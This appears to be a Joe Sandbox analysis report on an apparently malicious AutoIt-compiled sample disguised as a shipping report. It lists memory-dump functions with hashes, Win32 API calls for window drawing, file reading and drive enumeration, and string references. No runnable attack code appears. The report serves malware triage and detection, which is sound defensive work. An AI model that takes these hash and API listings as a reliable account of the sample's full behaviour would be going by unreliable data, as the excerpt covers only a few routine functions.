Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a952d09890b6e78a70d6a66e5921a0c49ccbe58e92602ce358d1c37b8bd07953
Instruction ID: a72593ee7f2a5e2c5253f39f3d8f6d73360c40ecc218339e0053c2a57ec20897
Opcode Fuzzy Hash: a952d09890b6e78a70d6a66e5921a0c49ccbe58e92602ce358d1c37b8bd07953
Instruction Fuzzy Hash: E422AF71A0060ADFDF14CFA8D881AEEB7F5FF44300F10452AE816A7391EB35AA55DB61

Function 000991C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb487e6a3778077c5be9992a43ddb2509048e3add4124b42b33c0a82fbd1d687
Instruction ID: 46c6bcb260d48e47c90b049e54e5ce9fb8cbd8167d0552601857a4d34e021f7e
Opcode Fuzzy Hash: cb487e6a3778077c5be9992a43ddb2509048e3add4124b42b33c0a82fbd1d687
Instruction Fuzzy Hash: E002B6B0A0020AEFDF15DF54D881AAEB7B5FF44300F118169E8169F391EB31EA51DB91

Function 000B1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 75fd8b5bad991b3812535edccebc90e70db5c6877bc41cd05d9f89ccafcaf69d
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 0E9156726080E34ADBA9463E85740FEFFE15F923A135A07ADD4F2CA1C5FE24D964D620

Function 000B19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 26caf82842936002b1322aeb0c92229b5e009e6a0db8f99c436fba4db7b23920
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: DB91C4322090E34EDBAD427A84744FEFFE15B923A235A079ED4F2CA1C5FE24D564D620

Function 000B7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a76efb747becd7a419834f35a987334610c80611e082528bbcd0d430386637c
Instruction ID: 548e3d7ccffa3c1dd7a0195c7d444af2eca3a6b345e1cc5a8586f23caa6ce661
Opcode Fuzzy Hash: 0a76efb747becd7a419834f35a987334610c80611e082528bbcd0d430386637c
Instruction Fuzzy Hash: 06614671208709A6DEF49A288CA5FFE23D8DFC1700F14491EE94EDB2D2DB119E42CB56

Function 000B7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bbd52330e760fc32fc498fcf43be33d6c2d71d67d667e31941fb3e87006121
Instruction ID: ab306c3671f177d8c404adc01632aaa81153a07ea68c1e156767cbaf7f8e9b05
Opcode Fuzzy Hash: a5bbd52330e760fc32fc498fcf43be33d6c2d71d67d667e31941fb3e87006121
Instruction Fuzzy Hash: DA617A3120870956DEB85A2888A5BFF23F8DFC6780F104959E94FDF692DA12DD42C355

Function 000B1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 8e1ad93997e0e215becf7e92a5ca5a23e63155b42aac7db74fd770fe462ef254
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 1781643260D0E34ADBAD463A85344FEFFE16F923A135A079DD4F2CB1C1EE248654E620

Function 03528A68 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 6dd04a5f4fca34722884002501f504a0b289e1460e9f455f3a423fe6e5436b3b
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 6841A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90

Function 00102046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d72f0ba70bac5015ab489d5801f0125e73c7af19c2bc8caf5a02c27b5c5df54
Instruction ID: b9f99399a3786f92674a14b298269d32aee023d21006cc2ca5661e1da656c36d
Opcode Fuzzy Hash: 4d72f0ba70bac5015ab489d5801f0125e73c7af19c2bc8caf5a02c27b5c5df54
Instruction Fuzzy Hash: 9721B7326206118BD728CF79C8276BE73E5A754310F15866EF4A7C37D1DE79A944CB80

Function 03528958 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: f789d04f4dec975476619d57f35dc02e47fd627e3175eb5d1d6597e3da7a8229
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: B701A478A00219EFCB44DF99D5909AEFBF5FF48310F248599D919A7351D730AE41DB80

Function 035288F8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 6be9a4741bd83bd1a9b647cc4813f018e7c81ad09dc754b02271973b2d3dc0b1
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 1301D278A00209EFCB48DF98D5909AEFBF5FB48310F208599D809A7340D730AE41DB80

Function 035272D8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00112ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00112B30
DeleteObject.GDI32(00000000), ref: 00112B43
DestroyWindow.USER32 ref: 00112B52
GetDesktopWindow.USER32 ref: 00112B6D
GetWindowRect.USER32(00000000), ref: 00112B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00112CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00112CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00112CF8
GetClientRect.USER32(00000000,?), ref: 00112D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00112D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00112D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00112D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00112D80
GlobalLock.KERNEL32(00000000), ref: 00112D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00112D98
GlobalUnlock.KERNEL32(00000000), ref: 00112DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00112DA8
GlobalFree.KERNEL32(00000000), ref: 00112DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00112DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0012FC38,00000000), ref: 00112DDB
GlobalFree.KERNEL32(00000000), ref: 00112DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00112E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00112E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00112E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011303F

Strings

, xrefs: 00112FC5
static, xrefs: 00112D3A, 00112E91
AutoIt v3, xrefs: 00112CF2
DISPLAY, xrefs: 00112EA2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 218512d896f3d7f7be7056e296c9a5141f8512da58ada728c512446cea761c2e
Instruction ID: f24353cad9be79c0ca13fadb45cbea4ed6af3f1f22f1af4b493ee21290ec3f36
Opcode Fuzzy Hash: 218512d896f3d7f7be7056e296c9a5141f8512da58ada728c512446cea761c2e
Instruction Fuzzy Hash: D4026B71900215EFDB24DF64DD89EAE7BB9FF48710F048158F915AB2A1CB70AD91CBA0

Function 001270D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0012712F
GetSysColorBrush.USER32(0000000F), ref: 00127160
GetSysColor.USER32(0000000F), ref: 0012716C
SetBkColor.GDI32(?,000000FF), ref: 00127186
SelectObject.GDI32(?,?), ref: 00127195
InflateRect.USER32(?,000000FF,000000FF), ref: 001271C0
GetSysColor.USER32(00000010), ref: 001271C8
CreateSolidBrush.GDI32(00000000), ref: 001271CF
FrameRect.USER32(?,?,00000000), ref: 001271DE
DeleteObject.GDI32(00000000), ref: 001271E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00127230
FillRect.USER32(?,?,?), ref: 00127262
GetWindowLongW.USER32(?,000000F0), ref: 00127284

Part of subcall function 001273E8: GetSysColor.USER32(00000012), ref: 00127421
Part of subcall function 001273E8: SetTextColor.GDI32(?,?), ref: 00127425
Part of subcall function 001273E8: GetSysColorBrush.USER32(0000000F), ref: 0012743B
Part of subcall function 001273E8: GetSysColor.USER32(0000000F), ref: 00127446
Part of subcall function 001273E8: GetSysColor.USER32(00000011), ref: 00127463
Part of subcall function 001273E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00127471
Part of subcall function 001273E8: SelectObject.GDI32(?,00000000), ref: 00127482
Part of subcall function 001273E8: SetBkColor.GDI32(?,00000000), ref: 0012748B
Part of subcall function 001273E8: SelectObject.GDI32(?,?), ref: 00127498
Part of subcall function 001273E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001274B7
Part of subcall function 001273E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001274CE
Part of subcall function 001273E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001274DB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 8a4cb951130fbdafd135eb84f77ac9d42420e614a3490e50b079b730078e7240
Instruction ID: f3538dda5445f2a57415f8d7cf3bb48e4b60a6639250e906c23e7acaf5425df5
Opcode Fuzzy Hash: 8a4cb951130fbdafd135eb84f77ac9d42420e614a3490e50b079b730078e7240
Instruction Fuzzy Hash: 46A19272108311FFD7109F60DC49A6F7BA9FF89320F100A19FA62961E1D771E9A5CB92

Function 000A8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 000A8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 000E6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000E6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000E6F43

Part of subcall function 000A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000A8BE8,?,00000000,?,?,?,?,000A8BBA,00000000,?), ref: 000A8FC5

SendMessageW.USER32(?,00001053), ref: 000E6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000E6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 000E6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 000E6FB7

Strings

0, xrefs: 000E6DCF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 25b885a14067988429cbecbf89cda3e3ded12f661ef663450b9fbe0e94b12ec6
Instruction ID: 4481bd152e6e92b9f6b9449284abc80c761e41568ce28d0e3d8cd13de24b1917
Opcode Fuzzy Hash: 25b885a14067988429cbecbf89cda3e3ded12f661ef663450b9fbe0e94b12ec6
Instruction Fuzzy Hash: FA12CE30600281EFC765CF15E848BAAB7E1FB65340F188569F595AB661CB32EC92CF91

Function 00112711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0011273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0011286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001128A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001128B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00112900
GetClientRect.USER32(00000000,?), ref: 0011290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00112955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00112964
GetStockObject.GDI32(00000011), ref: 00112974
SelectObject.GDI32(00000000,00000000), ref: 00112978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00112988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00112991
DeleteDC.GDI32(00000000), ref: 0011299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001129C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 001129DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00112A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00112A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00112A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00112A77
GetStockObject.GDI32(00000011), ref: 00112A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00112A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00112A97

Strings

static, xrefs: 0011294F, 00112A71
AutoIt v3, xrefs: 001128F8
DISPLAY, xrefs: 0011295A
msctls_progress32, xrefs: 00112A13

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: ddd323140508a7bf1b9f3afa671cabef265a207d5a35bb23d0e272ca4cbb68bb
Instruction ID: 86792ff3013100a90e6d6abff3c10acab13a62a5cf24b52e3b660ab7090d83e4
Opcode Fuzzy Hash: ddd323140508a7bf1b9f3afa671cabef265a207d5a35bb23d0e272ca4cbb68bb
Instruction Fuzzy Hash: 92B14B71A00215BFEB24DF68DC4AFAE7BA9FB08710F004114FA15E7691D7B0AD90CB94

Function 00104ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00104AED
GetDriveTypeW.KERNEL32(?,0012CB68,?,\\.\,0012CC08), ref: 00104BCA
SetErrorMode.KERNEL32(00000000,0012CB68,?,\\.\,0012CC08), ref: 00104D36

Strings

ATAPI, xrefs: 00104C91
iSCSI, xrefs: 00104CC2
SAS, xrefs: 00104CC9
SATA, xrefs: 00104CD0
Unknown, xrefs: 00104BED, 00104C83
RAID, xrefs: 00104CBB
PhysicalDrive, xrefs: 00104B76
FileBackedVirtual, xrefs: 00104CEC
ATA, xrefs: 00104C98
RAMDisk, xrefs: 00104BF4
SCSI, xrefs: 00104C8A
USB, xrefs: 00104CB4
Fixed, xrefs: 00104C09
1394, xrefs: 00104C9F
CDROM, xrefs: 00104BFB
SSD, xrefs: 00104C4A
\\.\, xrefs: 00104B3F
Removable, xrefs: 00104C10, 00104C15
Fibre, xrefs: 00104CAD
Network, xrefs: 00104C02
SSA, xrefs: 00104CA6
MMC, xrefs: 00104CDE
Virtual, xrefs: 00104CE5

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 46e17b602fab5c00465ed82cf44b46c6a7fa555a7b6f2e8a5627bf58b033185c
Instruction ID: f592ea4b528269338fa249bd5704889fdecf3ba3f7de7c255e42380d71970bec
Opcode Fuzzy Hash: 46e17b602fab5c00465ed82cf44b46c6a7fa555a7b6f2e8a5627bf58b033185c
Instruction Fuzzy Hash: 0861F1B0205105EBDB08DF64CBC29BC77B0AB45301B648415FE96AF6D2DBB2ED45EB81

Function 001273E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00127421
SetTextColor.GDI32(?,?), ref: 00127425
GetSysColorBrush.USER32(0000000F), ref: 0012743B
GetSysColor.USER32(0000000F), ref: 00127446
CreateSolidBrush.GDI32(?), ref: 0012744B
GetSysColor.USER32(00000011), ref: 00127463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00127471
SelectObject.GDI32(?,00000000), ref: 00127482
SetBkColor.GDI32(?,00000000), ref: 0012748B
SelectObject.GDI32(?,?), ref: 00127498
InflateRect.USER32(?,000000FF,000000FF), ref: 001274B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001274CE
GetWindowLongW.USER32(00000000,000000F0), ref: 001274DB
